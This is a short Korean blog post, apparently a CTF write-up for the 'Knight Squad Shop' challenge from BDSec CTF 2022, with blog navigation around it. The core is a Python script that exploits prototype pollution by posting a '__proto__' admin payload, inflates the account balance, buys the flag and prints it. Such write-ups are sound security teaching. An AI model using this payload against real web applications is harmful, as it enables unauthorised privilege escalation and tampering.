$ whoami
Home
  • 분류 전체보기 (123)
    • Exploit (10)
      • Tools (2)
      • Exploit (5)
      • Bug Bounty (3)
    • Wargame (84)
      • HackCTF (15)
      • XSS game (6)
      • Dreamhack (2)
      • Webhacking.kr (10)
      • XSS Challenges (8)
      • H4CKING GAME (2)
      • 정보보호영재교육원 (1)
      • Lord of SQL Injection (40)
    • CTF (29)
      • YISF 2022 (0)
      • CBHC 2022 (1)
      • HeroCTF v4 (2)
      • corCTF 2022 (2)
      • Aero CTF 2022 (0)
      • BDSec CTF 2022 (4)
      • San Diego CTF 2022 (5)
      • WACon 2022 Qualifier (1)
      • Cyber Conflict Exercise 202.. (4)
      • DiceCTF 2023 (1)
      • Incognito 4.0 (3)
      • BYUCTF 2023 (1)
      • DEF CON 31 (1)
      • 2023 HackTheon Sejong (1)
      • Cyber Conflict Exercise 202.. (2)
      • CDDC 2023 (1)
      • YISF 2023 (0)
    • Archive (0)
Home
  • 분류 전체보기 (123)
    • Exploit (10)
      • Tools (2)
      • Exploit (5)
      • Bug Bounty (3)
    • Wargame (84)
      • HackCTF (15)
      • XSS game (6)
      • Dreamhack (2)
      • Webhacking.kr (10)
      • XSS Challenges (8)
      • H4CKING GAME (2)
      • 정보보호영재교육원 (1)
      • Lord of SQL Injection (40)
    • CTF (29)
      • YISF 2022 (0)
      • CBHC 2022 (1)
      • HeroCTF v4 (2)
      • corCTF 2022 (2)
      • Aero CTF 2022 (0)
      • BDSec CTF 2022 (4)
      • San Diego CTF 2022 (5)
      • WACon 2022 Qualifier (1)
      • Cyber Conflict Exercise 202.. (4)
      • DiceCTF 2023 (1)
      • Incognito 4.0 (3)
      • BYUCTF 2023 (1)
      • DEF CON 31 (1)
      • 2023 HackTheon Sejong (1)
      • Cyber Conflict Exercise 202.. (2)
      • CDDC 2023 (1)
      • YISF 2023 (0)
    • Archive (0)
블로그 내 검색
CONTACT

HACKINTOANETWORK

SECURITY RESEARCHER, BUG HUNTER, HACKER

  • CTF/BDSec CTF 2022

    [BDSec CTF 2022] Knight Squad Shop

    2022. 7. 22.

    by. hackintoanetwork


    이 문제는 프로토 타입 취약점을 이용하여 풀 수 있었다.

    귀찮아서 자세한 writeup은 나중에 써서 올리겠다. 

    import requests
    
    def req_post(api,postData):
        headers = {'content-type': 'application/json'}
        url = "http://206.189.236.145:3000/" + api
        res = session.post(url=url, headers=headers, data=postData)
        return res.text
    
    if __name__ == "__main__":
        session = requests.session()
        print(req_post('api/v1/sell','{"__proto__":{"admin": true}}'))
        print(req_post('api/v1/money','{"money": 2.5e+25}'))
        print(req_post('api/v1/buy','{"product":"flags","quantity":1}'))

    Flag : BDSEC{mummy_i_can't_write_javaScript}

     

    저작자표시 비영리 (새창열림)

    'CTF > BDSec CTF 2022' 카테고리의 다른 글

    [BDSec CTF 2022] Awesome Calculator  (0) 2022.07.22
    [BDSec CTF 2022] Awesome Note Keeping  (0) 2022.07.22
    [BDSec CTF 2022] Jungle Templating  (0) 2022.07.22

    댓글

    관련글

    • [BDSec CTF 2022] Awesome Calculator 2022.07.22
    • [BDSec CTF 2022] Awesome Note Keeping 2022.07.22
    • [BDSec CTF 2022] Jungle Templating 2022.07.22
    맨 위로
전체 글 보기
Tistory 로그인
Tistory 로그아웃
로그아웃 글쓰기 관리

Today

Total

Powered by hackintoanetwork

Designed by Nana
블로그 이미지
hackintoanetwork

티스토리툴바